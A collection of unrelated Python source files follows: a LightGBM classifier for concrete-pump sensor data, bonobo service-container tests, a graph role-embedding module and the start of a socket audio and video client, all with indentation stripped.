pickle_path = 'concrete/pickle/'
prediction_path = 'concrete/prediction/'
v = '2'
# t = '_total'
t = ''
class Concrete(object):
"""
data mining for concrete
"""
def __init__(self, do_pre=False):
self.id2file = {}
self.id2lab = {}
self.detail_map = {}
self.detail_pickle = {}
self.f1_max_index = 0.5
self.f1_map = {index: 0 for index in range(0, 5)}
self.version = datetime.now().strftime("%m%d%H%M")
self.seed = 333
self.EARLY_STOP = 300
self.OPT_ROUNDS = 2444
self.MAX_ROUNDS = 300000
self.evaluate_num = 0
self.params = {
'boosting': 'gbdt',
'objective': 'binary',
'learning_rate': 0.01,
'max_depth': -1,
'min_child_samples': 20,
'max_bin': 255,
'subsample': 0.85,
'subsample_freq': 10,
'colsample_bytree': 0.8,
'min_child_weight': 0.001,
'subsample_for_bin': 200000,
'min_split_gain': 0,
'reg_alpha': 0,
'reg_lambda': 0,
'num_leaves': 63,
'seed': self.seed,
'nthread': 20,
'metric': "None",
"verbose": -1
}
self.pre_data_list(do_pre)
def load_basic(self, file_type):
"""
load basic
@param file_type: 1-submit_example, 0-train_labels
"""
file_name = 'submit_example' if file_type else 'train_labels'
file_name += '.csv'
with open(data_path + file_name, 'r') as f:
train_list = f.readlines()[1:]
self.id2file = {
index: train[:-1].split(',')[0] for index, train in enumerate(train_list)}
self.id2lab = {index: int(train[:-1].split(',')[1])
for index, train in enumerate(train_list)}
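# Illustrative note (not in the original source): each CSV line is assumed to look
# like "sample_file_name,label", e.g. "a1b2c3.csv,1", so id2file maps row index ->
# file name and id2lab maps row index -> 0/1 label.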
def load_detail(self, file_type, block_size=500):
"""
load detail
@param file_type: 1-submit_example, 0-train_labels
"""
pickle_file = 'submit_middle' if file_type else 'train_middle'
pickle_file += '.pickle'
detail_pickle = load_bigger(pickle_path + pickle_file)
print('load over')
id_len = len(self.id2lab.keys())
for block_index in range((id_len - 1) // block_size + 1):
index_min = block_size * block_index
index_max = min(id_len, (block_index + 1) * block_size)
threadings = []
for index in list(self.id2file.keys())[index_min:index_max]:
label_id = self.id2lab[index]
detail_csv = detail_pickle[index]
work = threading.Thread(
target=self.pre_data_once, args=(index, file_type, label_id, detail_csv,))
threadings.append(work)
for work in threadings:
work.start()
for work in threadings:
work.join()
if not index_max % 10:
print(index_max)
detail_map = [self.detail_map[k]
for k in sorted(self.detail_map.keys())]
output_file = 'submit_middle' if file_type else 'train_middle'
title_basic = ['活塞工作时长', '发动机转速', '油泵转速', '泵送压力', '液压油温', '流量档位',
'分配压力', '排量电流', '低压开关', '高压开关', '搅拌超压信号', '正泵', '反泵', '设备类型']
# title_min = [index + '_min'for index in title_basic[1:8]]
# title_max = [index + '_max'for index in title_basic[1:8]]
# title_mean = [index + '_mean'for index in title_basic[1:8]]
# title_std = [index + '_std'for index in title_basic[1:8]]
# title_poor = [index + '_poor'for index in title_basic[1:8]]
# title_median = [index + '_median'for index in title_basic[1:8]]
# title_total = [index + '_total'for index in title_basic[1:8]]
# title_hit = [index + '_hit'for index in title_basic[1:8]]
# title_constant = ['label', '活塞工作时长', '低压开关', '正泵', '设备类型', '低压开关&正泵']
# title_collection = [*title_min, *title_mean, *title_max, *title_poor, *title_std, *title_median, *title_total, *title_hit]
# title_collection_diff = [index + '_diff' for index in title_collection]
# title_collection_diff_diff = [
# index + '_diff_diff' for index in title_collection]
# title_collection_diff_diff_diff = [
# index + '_diff_diff_diff' for index in title_collection]
# title_collection_diff_diff_diff2 = [
# index + '_diff_diff_diff2' for index in title_collection]
# title_collection_diff_diff_diff3 = [
# index + '_diff_diff_diff3' for index in title_collection]
# title_collection_ptr = [index + '_pct' for index in title_collection]
# title_collection_ptr_diff = [
# index + '_pct_diff' for index in title_collection]
# title_all = [*title_constant, *title_collection, *title_collection_diff,
# *title_collection_diff_diff, *title_collection_diff_diff_diff,
# *title_collection_ptr, *title_collection_ptr_diff,
# *title_collection_diff_diff_diff2, *title_collection_diff_diff_diff3]
# title_all = [*title_collection_diff_diff_diff2, *title_collection_diff_diff_diff3]
title_skew = [index + '_skew'for index in title_basic[0:8]]
with open(data_path + output_file, 'w') as f:
f.write(",".join(title_skew) + '\n')
# f.write("nunique" + '\n')
f.write("\n".join([str(index) for index in detail_map]))
def load_all(self, file_type):
"""
load all
"""
self.load_basic(file_type)
self.load_detail(file_type)
self.detail_map = {}
def load_all_pickle(self, file_type):
"""
load all
"""
self.load_basic(file_type)
self.load_detail_pickle(file_type)
self.detail_pickle = {}
def load_detail_pickle(self, file_type, block_size=300):
"""
load detail
@param file_type: 1-submit_example, 0-train_labels
"""
id_len = len(self.id2lab.keys())
for block_index in range((id_len - 1) // block_size + 1):
index_min = block_size * block_index
index_max = min(id_len, (block_index + 1) * block_size)
threadings = []
for index in list(self.id2file.keys())[index_min:index_max]:
file_id = self.id2file[index]
work = threading.Thread(
target=self.pre_data_two, args=(index, file_type, file_id,))
threadings.append(work)
for work in threadings:
work.start()
for work in threadings:
work.join()
print(index_max)
output_file = 'submit_middle' if file_type else 'train_middle'
output_file += '.pickle'
dump_bigger(self.detail_pickle, pickle_path + output_file)
def pre_data_list(self, do_pre):
version = begin_time()
df_columns = pd.read_csv(data_path + 'train_middle_total').columns
begin_index = 0
with open(model_path + v + 'columns.csv', 'r') as f:
str_f = f.readline()
if str_f[-1] == '\n':
str_f = str_f[:-1]
good_columns = str_f.split(',')
with open(model_path + v + 'lastcolumn.csv', 'r') as f:
str_f = f.readline()
if str_f[-1] == '\n':
str_f = str_f[:-1]
while df_columns[begin_index] != str_f:
begin_index += 1
self.wait_columns = list(df_columns[begin_index + 6:])
self.good_columns = good_columns
self.basic_f1 = 0
if do_pre == True:
self.load_all(0)
self.load_all(1)
elif do_pre == 2:
self.load_all_pickle(0)
self.load_all_pickle(1)
else:
self.load_basic(1)
end_time(version)
def evaluate_f1(self, preds, train_data):
self.evaluate_num = self.evaluate_num + 1
labels = train_data.get_label()
if not self.evaluate_num % 50:
f1_list = [self.evaulate_model_once(labels, [int(indexs > (index / 100))
for indexs in preds]) for index in range(48, 53)]
max_index = f1_list.index(max(f1_list))
if max_index in self.f1_map:
self.f1_map[max_index] += 1
else:
self.f1_map[max_index] = 1
# print(labels, preds)
return 'f1', f1_list[2], True
else:
preds = [int(index > 0.5) for index in preds]
return 'f1', self.evaulate_model_once(labels, preds), True
def pre_data_two(self, detail_id, file_type, file_id):
file_folder = 'data_test' if file_type else 'data_train'
file_folder += '/'
file_folder += file_id
detail_csv = pd.read_csv(data_path + file_folder)
self.detail_pickle[detail_id] = detail_csv
def pre_data_once(self, detail_id, file_type, label_id, detail_csv):
# detail_basic = detail_csv.agg(['min', 'max', 'std', 'mean', 'median'])
# detail_max = detail_basic.iloc[1]
# detail_time = detail_csv.max()[0]
# detail_time = detail_max[0]
# detail_press = detail_max[8]
# detail_pump = detail_max[11]
# detail_type = detail_max[13]
# detail_add = detail_pump + detail_press
# detail_constant = [label_id, detail_time,
# detail_press, detail_pump, detail_type, detail_add]
# detail_max = detail_max[1:8]
# detail_min = detail_basic.iloc[0, 1:8]
# detail_poor = detail_max - detail_min
# detail_mean = detail_basic.iloc[3, 1:8]
# detail_std = detail_basic.iloc[2, 1:8]
# detail_median = detail_basic.iloc[4, 1:8]
# detail_total = [index * detail_time for index in detail_mean]
# detail_hit = [index * detail_time for index in detail_std]
# detail_collapse = [*detail_min, *detail_mean, *detail_max, *detail_poor,
# *detail_std, *detail_median, *detail_total, *detail_hit]
# del detail_csv['设备类型']
# detail_basic_diff = detail_csv.diff()
# detail_diff_basic = detail_basic_diff.agg(
# ['min', 'max', 'std', 'mean', 'median'])
# detail_diff_min = detail_diff_basic.iloc[0, 1:8]
# detail_diff_max = detail_diff_basic.iloc[1, 1:8]
# detail_diff_poor = detail_diff_max - detail_diff_min
# detail_diff_std = detail_diff_basic.iloc[2, 1:8]
# detail_diff_mean = detail_diff_basic.iloc[3, 1:8]
# detail_diff_median = detail_diff_basic.iloc[4, 1:8]
# detail_diff_total = [index * detail_time for index in detail_diff_mean]
# detail_diff_hit = [index * detail_time for index in detail_diff_std]
# detail_collapse_diff = [*detail_diff_min, *detail_diff_mean, *detail_diff_max, *detail_diff_poor,
# *detail_diff_std, *detail_diff_median, *detail_diff_total, *detail_diff_hit]
# detail_basic_diff_diff = detail_basic_diff.diff()
# detail_diff_diff_basic = detail_basic_diff_diff.agg(
# ['min', 'max', 'std', 'mean', 'median'])
# detail_diff_diff_min = detail_diff_diff_basic.iloc[0, 1:8]
# detail_diff_diff_max = detail_diff_diff_basic.iloc[1, 1:8]
# detail_diff_diff_poor = detail_diff_diff_max - detail_diff_diff_min
# detail_diff_diff_std = detail_diff_diff_basic.iloc[2, 1:8]
# detail_diff_diff_mean = detail_diff_diff_basic.iloc[3, 1:8]
# detail_diff_diff_median = detail_diff_diff_basic.iloc[4, 1:8]
# detail_diff_diff_total = [
# index * detail_time for index in detail_diff_diff_mean]
# detail_diff_diff_hit = [
# index * detail_time for index in detail_diff_diff_mean]
# detail_collapse_diff_diff = [*detail_diff_diff_min, *detail_diff_diff_mean, *detail_diff_diff_max,
# *detail_diff_diff_poor, *detail_diff_diff_std, *detail_diff_diff_median,
# *detail_diff_diff_total, *detail_diff_diff_hit]
# detail_basic_diff_diff_diff = detail_basic_diff_diff.diff()
# detail_diff_diff_diff_basic = detail_basic_diff_diff_diff.agg(
# ['min', 'max', 'std', 'mean', 'median'])
# detail_diff_diff_diff_min = detail_diff_diff_diff_basic.iloc[0, 1:8]
# detail_diff_diff_diff_max = detail_diff_diff_diff_basic.iloc[1, 1:8]
# detail_diff_diff_diff_poor = detail_diff_diff_diff_max - detail_diff_diff_diff_min
# detail_diff_diff_diff_std = detail_diff_diff_diff_basic.iloc[2, 1:8]
# detail_diff_diff_diff_mean = detail_diff_diff_diff_basic.iloc[3, 1:8]
# detail_diff_diff_diff_median = detail_diff_diff_diff_basic.iloc[4, 1:8]
# detail_diff_diff_diff_total = [
# index * detail_time for index in detail_diff_diff_diff_mean]
# detail_diff_diff_diff_hit = [
# index * detail_time for index in detail_diff_diff_diff_mean]
# detail_collapse_diff_diff_diff = [*detail_diff_diff_diff_min, *detail_diff_diff_diff_mean, *detail_diff_diff_diff_max,
# *detail_diff_diff_diff_poor, *detail_diff_diff_diff_std, *detail_diff_diff_diff_median,
# *detail_diff_diff_diff_total, *detail_diff_diff_diff_hit]
# detail_basic_diff_diff_diff2 = detail_basic_diff_diff_diff.diff()
# detail_diff_diff_diff2_basic = detail_basic_diff_diff_diff2.agg(
# ['min', 'max', 'std', 'mean', 'median'])
# detail_diff_diff_diff2_min = detail_diff_diff_diff2_basic.iloc[0, 1:8]
# detail_diff_diff_diff2_max = detail_diff_diff_diff2_basic.iloc[1, 1:8]
# detail_diff_diff_diff2_poor = detail_diff_diff_diff2_max - detail_diff_diff_diff2_min
# detail_diff_diff_diff2_std = detail_diff_diff_diff2_basic.iloc[2, 1:8]
# detail_diff_diff_diff2_mean = detail_diff_diff_diff2_basic.iloc[3, 1:8]
# detail_diff_diff_diff2_median = detail_diff_diff_diff2_basic.iloc[4, 1:8]
# detail_diff_diff_diff2_total = [
# index * detail_time for index in detail_diff_diff_diff2_mean]
# detail_diff_diff_diff2_hit = [
# index * detail_time for index in detail_diff_diff_diff2_mean]
# detail_collapse_diff_diff2_diff = [*detail_diff_diff_diff2_min, *detail_diff_diff_diff2_mean, *detail_diff_diff_diff2_max,
# *detail_diff_diff_diff2_poor, *detail_diff_diff_diff2_std, *detail_diff_diff_diff2_median,
# *detail_diff_diff_diff2_total, *detail_diff_diff_diff2_hit]
# detail_basic_diff_diff_diff3 = detail_basic_diff_diff_diff2.diff()
# detail_diff_diff_diff3_basic = detail_basic_diff_diff_diff3.agg(
# ['min', 'max', 'std', 'mean', 'median'])
# detail_diff_diff_diff3_min = detail_diff_diff_diff3_basic.iloc[0, 1:8]
# detail_diff_diff_diff3_max = detail_diff_diff_diff3_basic.iloc[1, 1:8]
# detail_diff_diff_diff3_poor = detail_diff_diff_diff3_max - detail_diff_diff_diff3_min
# detail_diff_diff_diff3_std = detail_diff_diff_diff3_basic.iloc[2, 1:8]
# detail_diff_diff_diff3_mean = detail_diff_diff_diff3_basic.iloc[3, 1:8]
# detail_diff_diff_diff3_median = detail_diff_diff_diff3_basic.iloc[4, 1:8]
# detail_diff_diff_diff3_total = [
# index * detail_time for index in detail_diff_diff_diff3_mean]
# detail_diff_diff_diff3_hit = [
# index * detail_time for index in detail_diff_diff_diff3_mean]
# detail_collapse_diff_diff3_diff = [*detail_diff_diff_diff3_min, *detail_diff_diff_diff3_mean, *detail_diff_diff_diff3_max,
# *detail_diff_diff_diff3_poor, *detail_diff_diff_diff3_std, *detail_diff_diff_diff3_median,
# *detail_diff_diff_diff3_total, *detail_diff_diff_diff3_hit]
# detail_basic_pct = detail_csv.pct_change()
# detail_pct_change_basic = detail_basic_pct.agg(
# ['min', 'max', 'std', 'mean', 'median'])
# detail_pct_change_min = detail_pct_change_basic.iloc[0, 1:8]
# detail_pct_change_max = detail_pct_change_basic.iloc[1, 1:8]
# detail_pct_change_poor = detail_pct_change_max - detail_pct_change_min
# detail_pct_change_std = detail_pct_change_basic.iloc[2, 1:8]
# detail_pct_change_mean = detail_pct_change_basic.iloc[3, 1:8]
# detail_pct_change_median = detail_pct_change_basic.iloc[4, 1:8]
# detail_pct_change_total = [
# index * detail_time for index in detail_pct_change_mean]
# detail_pct_change_hit = [
# index * detail_time for index in detail_pct_change_std]
# detail_collapse_ptr = [*detail_pct_change_min, *detail_pct_change_mean, *detail_pct_change_max,
# *detail_pct_change_poor, *detail_pct_change_std, *detail_pct_change_median,
# *detail_pct_change_total, *detail_pct_change_hit]
# detail_basic_pct_diff = detail_basic_pct.diff()
# detail_pct_diff_basic = detail_basic_pct_diff.agg(
# ['min', 'max', 'std', 'mean', 'median'])
# detail_pct_diff_min = detail_pct_diff_basic.iloc[0, 1:8]
# detail_pct_diff_max = detail_pct_diff_basic.iloc[1, 1:8]
# detail_pct_diff_poor = detail_pct_diff_max - detail_pct_diff_min
# detail_pct_diff_std = detail_pct_diff_basic.iloc[2, 1:8]
# detail_pct_diff_mean = detail_pct_diff_basic.iloc[3, 1:8]
# detail_pct_diff_median = detail_pct_diff_basic.iloc[4, 1:8]
# detail_pct_diff_total = [
# index * detail_time for index in detail_pct_diff_mean]
# detail_pct_diff_hit = [
# index * detail_time for index in detail_pct_diff_std]
# detail_collapse_pct_diff = [*detail_pct_diff_min, *detail_pct_diff_mean, *detail_pct_diff_max,
# *detail_pct_diff_poor, *detail_pct_diff_std, *detail_pct_diff_median,
# *detail_pct_diff_total, *detail_pct_diff_hit]
# detail = [*detail_constant, *detail_collapse, *detail_collapse_diff,
# *detail_collapse_diff_diff, *detail_collapse_diff_diff_diff,
# *detail_collapse_ptr, *detail_collapse_pct_diff,
# *detail_collapse_diff_diff2_diff, *detail_collapse_diff_diff3_diff]
# detail = [*detail_collapse_diff_diff2_diff, *detail_collapse_diff_diff3_diff]
self.detail_map[detail_id] = ",".join(
[str(index) for index in list(detail_csv.skew()[0:8])])
# self.detail_map[detail_id] = ",".join([str(index) for index in detail])
# self.detail_map[detail_id] = detail_csv['活塞工作时长'].nunique()
def pre_data(self, pre, slices):
"""
prepare data
"""
# detail_type = pd.get_dummies(pre['设备类型'], prefix=pre[['设备类型']].columns[0])
# pre = pre.drop(['设备类型'], axis=1)
# return pd.concat([pre, detail_type], axis=1)
pre['设备类型'] = pre['设备类型'].map(
{'ZV252': 0, 'ZV573': 1, 'ZV63d': 2, 'ZVa78': 3, 'ZVa9c': 4, 'ZVe44': 4, 'ZVfd4': 5})
if slices is None:
return pre
else:
columns_total = pre.columns
if not slices:
wait_columns = [*columns_total[:128], *columns_total[188:198]]
if slices == 11:
wait_columns = [*columns_total[:128]]
elif slices == 1:
wait_columns = [*columns_total[:128], *columns_total[178:198]]
elif slices == 2:
wait_columns = [*columns_total[:128], *
columns_total[178:198], *columns_total[218:228]]
elif slices < 9:
wait_columns = [*columns_total[:128], *columns_total[178:198], *
columns_total[218:228], *columns_total[88 + slices * 10:98 + slices * 10]]
else:
wait_columns = [*columns_total[:128], *columns_total[178:198], *
columns_total[218:228], *columns_total[108 + slices * 10:118 + slices * 10]]
# columns = [*columns_total[:118], *columns_total[178:188], *columns_total[118 + slices * 10:128 + slices * 10]]
# columns = columns_total[:118] + [:118 + 10 * slices]
# wait_columns = self.good_columns
# if slices != -1:
# wait_columns = [*wait_columns, self.wait_columns[slices]]
wait = pd.DataFrame(pre, columns=wait_columns)
return wait
def load_data(self, model=True, slices=None):
"""
load data for the specified mode
@param model: True - split train_middle into train/validation sets, False - train on train_middle and predict submit_middle
"""
print('Load data...')
if model:
pre = pd.read_csv(data_path + 'train_middle' + t)
target = pre['label'].values
pre = pre.drop(['label'], axis=1)
data = self.pre_data(pre, slices)
X_train, X_test, y_train, y_test = train_test_split(
data, target, test_size=0.25)
print('data split end')
# pre = pd.read_csv('concrete/data/train_middle')
# target = pre['label'].values
# pre = pre.drop(['label'], axis=1)
# X_train = self.pre_data(pre)
# y_train = target
# # X_train = self.X_train
# # y_train = self.y_train
# pre = pd.read_csv('concrete/data/submit_middle')
# target = pre['label'].values
# pre = pre.drop(['label'], axis=1)
# X_test = self.pre_data(pre)
# y_test = target
# print('data split end')
else:
pre = pd.read_csv(data_path + 'train_middle' + t)
target = pre['label'].values
pre = pre.drop(['label'], axis=1)
X_train = self.pre_data(pre, slices)
y_train = target
# X_train = self.X_train
# y_train = self.y_train
pre = pd.read_csv(data_path + 'submit_middle' + t)
target = pre['label'].values
pre = pre.drop(['label'], axis=1)
X_test = self.pre_data(pre, slices)
y_test = target
print('data split end')
self.X_test = X_test
self.X_train = X_train
self.y_test = y_test
self.y_train = y_train
def train_model(self):
"""
train model by lightgbm
"""
print('Start training...')
categorical = ['设备类型']
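# '设备类型' (device type) is integer-encoded in pre_data; listing it as a categorical
# feature tells LightGBM to treat those codes as unordered categories rather than numbers.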
dtrain = lgb.Dataset(self.X_train,
label=self.y_train,
feature_name=list(self.X_train.columns),
categorical_feature=categorical)
model = lgb.train(self.params,
dtrain,
num_boost_round=self.OPT_ROUNDS,
valid_sets=[dtrain],
valid_names=['train'],
verbose_eval=100,
feval=self.evaluate_f1)
importances = pd.DataFrame({'features': model.feature_name(),
'importances': model.feature_importance()})
importances.sort_values('importances', ascending=False, inplace=True)
model.save_model('concrete/model/{}.model'.format(self.version))
importances.to_csv(
'concrete/model/{}_importances.csv'.format(self.version), index=False)
self.gbm = model
self.dtrain = dtrain
# gbm = lgb.LGBMRegressor(
# objective='regression', num_leaves=31, learning_rate=0.095, n_estimators=29)
# gbm.fit(self.X_train, self.y_train, eval_set=[
# (self.X_test, self.y_test)], eval_metric='l1', early_stopping_rounds=5)
# self.gbm = gbm
def evaulate_model(self, model=True, slices=None):
"""
evaluate model by lightgbm
"""
print('Start predicting...')
y_pred = self.gbm.predict(
self.X_test, num_iteration=self.gbm.best_iteration)
print(self.f1_max_index)
predict = [int(index > self.f1_max_index) for index in y_pred]
if model:
print(self.evaulate_model_once(self.y_test, predict))
for index in range(30, 70):
distinguish = index / 100
predict = [int(index > distinguish) for index in y_pred]
print(self.evaulate_model_once(self.y_test, predict))
else:
file_name = pd.DataFrame(list(self.id2file.values()))
result = pd.DataFrame({'sample_file_name': file_name[0], 'label': predict}, columns=[
'sample_file_name', 'label'])
result.to_csv(
prediction_path + '{}.csv'.format(self.version + str(slices)), index=False)
def evaulate_model_once(self, result, predict):
"""
return the macro-F1 score (mean of per-class F1 for labels 0 and 1)
"""
result_f1 = (self.F1(result, predict, 0) +
self.F1(result, predict, 1)) / 2
# print(result_f1)
return result_f1
@jit
def F1(self, result, predict, true_value):
"""
F1
"""
true_num = 0
recall_num = 0
precision_num = 0
for index, values in enumerate(result):
# print(index, values, predict[index])
if values == true_value:
recall_num += 1
if values == predict[index]:
true_num += 1
if predict[index] == true_value:
precision_num += 1
# print(true_num, recall_num, precision_num)
R = true_num / recall_num if recall_num else 0
P = true_num / precision_num if precision_num else 0
return (2 * P * R) / (P + R) if (P + R) else 0
def optimize_model(self, model, index=None):
"""
optimize model by lightgbm
"""
# print('Feature importances:', list(self.gbm.feature_importance()))
print(self.X_train.iloc[0, ], self.X_train.columns, len(
self.X_train.columns), self.y_train[0])
dtrain = lgb.Dataset(self.X_train,
label=self.y_train,
feature_name=list(self.X_train.columns),
categorical_feature=['设备类型'])
eval_hist = lgb.cv(self.params,
dtrain,
nfold=5,
num_boost_round=self.MAX_ROUNDS,
early_stopping_rounds=self.EARLY_STOP,
verbose_eval=50,
seed=self.seed,
shuffle=True,
feval=self.evaluate_f1,
metrics="None"
)
result = [self.version, self.X_train.columns[-1]]
result.append('best n_estimators:' + str(len(eval_hist['f1-mean'])))
result.append('best cv score:' + str(eval_hist['f1-mean'][-1]) + '\n')
with open(model_path + v + 'result', 'a') as f:
f.write('\n'.join([str(index) for index in result]))
print('best n_estimators:', len(eval_hist['f1-mean']))
print('best cv score:', eval_hist['f1-mean'][-1])
self.OPT_ROUNDS = len(eval_hist['f1-mean'])
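# Threshold search: self.f1_map is assumed to be filled by evaluate_f1 with the CV F1
# obtained at decision thresholds 0.48-0.52; keep the best-scoring threshold.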
f1_max_list = [self.f1_map[k] for k in sorted(self.f1_map.keys())]
print(self.f1_map)
f1_max_index = range(48, 53)[f1_max_list.index(max(f1_max_list))] / 100
self.f1_max_index = f1_max_index
if (eval_hist['f1-mean'][-1] > self.basic_f1):
self.basic_f1 = eval_hist['f1-mean'][-1]
if index is not None and index != -1:
self.good_columns.append(self.wait_columns[index])
with open(model_path + v + 'columns.csv', 'w') as f:
f.write(','.join([str(index) for index in self.good_columns]))
with open(model_path + v + 'lastcolumn.csv', 'w') as f:
f.write(str(self.X_train.columns[-1]))
# estimator = lgb.LGBMRegressor(num_leaves=31)
# param_grid = {
# 'learning_rate': [0.08, 0.085, 0.09, 0.095, 0.1],
# 'n_estimators': range()
# }
# gbm = GridSearchCV(estimator, param_grid,
# scoring='roc_auc', cv=5, n_jobs=20)
# gbm.fit(self.X_train, self.y_train)
# print('Best parameters found by grid search are:', gbm.best_params_)
def load_one_table(self, file_type):
"""
load one table
@param file_type: 1-submit_example, 0-train_labels
"""
pickle_file = 'submit_middle' if file_type else 'train_middle'
pickle_file += '.pickle'
detail_pickle = load_bigger(pickle_path + pickle_file)
print('load over')
def test_f1(self, num, dimension):
"""
random test f1
"""
result_list = [np.random.randint(0, 2, dimension)
for index in range(num)]
prediction_list = [np.random.randint(
0, 2, dimension) for index in range(num)]
version = begin_time()
for index in range(num):
self.F1(result_list[index], prediction_list[index], 0)
self.F1(result_list[index], prediction_list[index], 1)
end_time(version)
version = begin_time()
for index in range(num):
f1_score(result_list[index], prediction_list[index], pos_label=0)
f1_score(result_list[index], prediction_list[index], pos_label=1)
end_time(version)
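# Note: `empty` below expects a module-level nested dict named `test`
# ({outer_id: {int_key: ...}}); it fills any missing integer keys below the
# maximum key with empty dicts.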
def empty():
for ii, jj in test.items():
temp_max = max(jj.keys())
for kk in range(1, temp_max):
if kk not in jj:
print(ii, kk)
test[ii][kk] = {}
if __name__ == '__main__':
version = begin_time()
model = False
concrete = Concrete()
for index in range(12):
# for index in range(-1, len(concrete.wait_columns)):
concrete.load_data(model, index)
concrete.optimize_model(model, index)
concrete.train_model()
concrete.evaulate_model(model, index)
# model = False
# concrete.load_data(model)
# concrete.train_model()
# concrete.evaulate_model(model)
end_time(version)
|
test_services.py
|
import threading
import time
import pytest
from bonobo.config import Configurable, Container, Exclusive, Service, use
from bonobo.config.services import validate_service_name, create_container
from bonobo.util import get_name
class PrinterInterface():
def print(self, *args):
raise NotImplementedError()
class ConcretePrinter(PrinterInterface):
def __init__(self, prefix):
self.prefix = prefix
def print(self, *args):
return ';'.join((self.prefix, *args))
SERVICES = Container(
printer0=ConcretePrinter(prefix='0'),
printer1=ConcretePrinter(prefix='1'),
)
class MyServiceDependantConfigurable(Configurable):
printer = Service(PrinterInterface, )
def __call__(self, *args, printer: PrinterInterface):
return printer.print(*args)
def test_service_name_validator():
assert validate_service_name('foo') == 'foo'
assert validate_service_name('foo.bar') == 'foo.bar'
assert validate_service_name('Foo') == 'Foo'
assert validate_service_name('Foo.Bar') == 'Foo.Bar'
assert validate_service_name('Foo.a0') == 'Foo.a0'
with pytest.raises(ValueError):
validate_service_name('foo.0')
with pytest.raises(ValueError):
validate_service_name('0.foo')
def test_service_dependency():
o = MyServiceDependantConfigurable(printer='printer0')
assert o('foo', 'bar', printer=SERVICES.get('printer0')) == '0;foo;bar'
assert o('bar', 'baz', printer=SERVICES.get('printer1')) == '1;bar;baz'
assert o('foo', 'bar', **SERVICES.kwargs_for(o)) == '0;foo;bar'
def test_service_dependency_unavailable():
o = MyServiceDependantConfigurable(printer='printer2')
with pytest.raises(KeyError):
SERVICES.kwargs_for(o)
class VCR:
def __init__(self):
self.tape = []
def append(self, x):
return self.tape.append(x)
def test_exclusive():
vcr = VCR()
vcr.append('hello')
def record(prefix, vcr=vcr):
with Exclusive(vcr):
for i in range(5):
vcr.append(' '.join((prefix, str(i))))
time.sleep(0.05)
threads = [threading.Thread(target=record, args=(str(i), )) for i in range(5)]
for thread in threads:
thread.start()
time.sleep(0.01) # this is not good practice, how to test this without sleeping ?? XXX
for thread in threads:
thread.join()
assert vcr.tape == [
'hello', '0 0', '0 1', '0 2', '0 3', '0 4', '1 0', '1 1', '1 2', '1 3', '1 4', '2 0', '2 1', '2 2', '2 3',
'2 4', '3 0', '3 1', '3 2', '3 3', '3 4', '4 0', '4 1', '4 2', '4 3', '4 4'
]
def test_requires():
vcr = VCR()
services = Container(output=vcr.append)
@use('output')
def append(out, x):
out(x)
svcargs = services.kwargs_for(append)
assert len(svcargs) == 1
assert svcargs['output'] == vcr.append
@pytest.mark.parametrize('services', [None, {}])
def test_create_container_empty_values(services):
c = create_container(services)
assert len(c) == 2
assert 'fs' in c and get_name(c['fs']) == 'OSFS'
assert 'http' in c and get_name(c['http']) == 'requests'
def test_create_container_override():
c = create_container({
'http': 'http',
'fs': 'fs',
})
assert len(c) == 2
assert 'fs' in c and c['fs'] == 'fs'
assert 'http' in c and c['http'] == 'http'
|
rolemagnet.py
|
# coding=utf-8
import numpy as np
import networkx as nx
import queue
from .graphwave import *
import multiprocessing, time
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
from .som import SOM
def sub_graph(G, node, g, que, checked):
que.put(node)
while not que.empty():
search_adj(G, que.get(), g, que, checked)
checked.clear()
def search_adj(G, node, g, que, checked):
checked[node] = 1  # mark this node as already searched
for k,v in G[node].items():
g.add_weighted_edges_from([(node, k, v['weight'])])
if k not in checked:
que.put(k)
def embed(G, rev_G, sample, index, curNode):
search_queue=queue.Queue()
checked={}
# Convergence graph: sub-graph built from the reversed (incoming) edges
gat = nx.Graph()
gat.add_nodes_from(G)
sub_graph(rev_G, curNode, gat, search_queue, checked)
chi_gat,_,_ = graphwave_alg(gat, sample, node=index, verbose=True)
# Divergence graph: sub-graph built from the original (outgoing) edges
dif = nx.Graph()
dif.add_nodes_from(G)
sub_graph(G, curNode, dif, search_queue, checked)
chi_dif,_,_ = graphwave_alg(dif, sample, node=index, verbose=True)
# Put the embedding result into the output queue
chi_queue.put([index, np.concatenate((chi_gat[index],chi_dif[index]), axis=0)])
chi_queue = multiprocessing.Queue()  # output queue for the worker processes
def role_magnet(G, balance=None, sample=np.linspace(0,100,25), shape=None):
'''
Parameters
G        the graph, a networkx DiGraph
balance  per-node difference between incoming and outgoing flow
sample   sampling points
shape    shape of the SOM competitive layer
-----------------------------------
Returns
vec      vector representation of each node
role     clustering result; key: role id, value: [cluster centre position, members of that role]
label    role id assigned to each node
'''
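# Usage sketch (hypothetical example):
#   import networkx as nx
#   G = nx.DiGraph()
#   G.add_weighted_edges_from([('a', 'b', 1.0), ('b', 'c', 2.0)])
#   vec, role, label = role_magnet(G)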
rev_G = G.reverse()
# Spawn one worker process per node
for index,curNode in enumerate(G.nodes):
proc = multiprocessing.Process(target=embed, args=(G,rev_G,sample,index,curNode))
proc.start()
finished=0
total=len(G.nodes)
chi=np.empty((total, len(sample)*8))
count=0
character=['/','-','\\','-']
while finished != total:
# The main process collects each node's embedding result from the queue
while not chi_queue.empty():
res=chi_queue.get()
chi[res[0]]=res[1]
finished+=1
# Print progress
print('Embedding: %5.2f%% %c' %(finished/total*100, character[count%4]), end='\r')
count+=1
time.sleep(1)
print()
# Reduce to two dimensions, then append the flow balance
reduced=PCA(n_components=2).fit_transform(StandardScaler().fit_transform(chi))
vec=reduced
if balance is not None:
# Rescale the flow balance to match the spread of the reduced embedding
balance=np.array(balance).reshape(len(balance),1)
chi_t=np.transpose(reduced)
balance=(max(chi_t[0])-min(chi_t[0])+max(chi_t[1])-min(chi_t[1]))/2*balance
vec=np.concatenate((reduced, balance), axis=1)
# Reduce to two dimensions again
reduced=PCA(n_components=2).fit_transform(StandardScaler().fit_transform(vec))
# mid_time=time.perf_counter()
som=SOM(reduced, shape)
role,label=som.run()
return vec,role,label
|
client_tw_av.py
|
import socket, sys, cv2, pickle, struct
from threading import Thread
from datetime import datetime
from time import sleep
import matplotlib.pyplot as plt
import numpy as np
import pyaudio
sending, receiving = False, False
HEADERSIZE = 10
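# Framing: each pickled JPEG frame is prefixed with a fixed-width, left-aligned
# 10-character length header (e.g. b'52341     ' + payload), so the receiver can
# read the header first and then keep reading until the full frame has arrived.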
class myClass:
def __init__(self, name, img):
self.threads = []
self.stop = False
self.name = name
self.img = img
self.local_buffer = None
self.p = pyaudio.PyAudio()
self.stream = self.p.open(format=sample_format, channels=channels, rate=fs, frames_per_buffer=chunk, input=True, output=True)
def send_to_client(self, clientsocket):
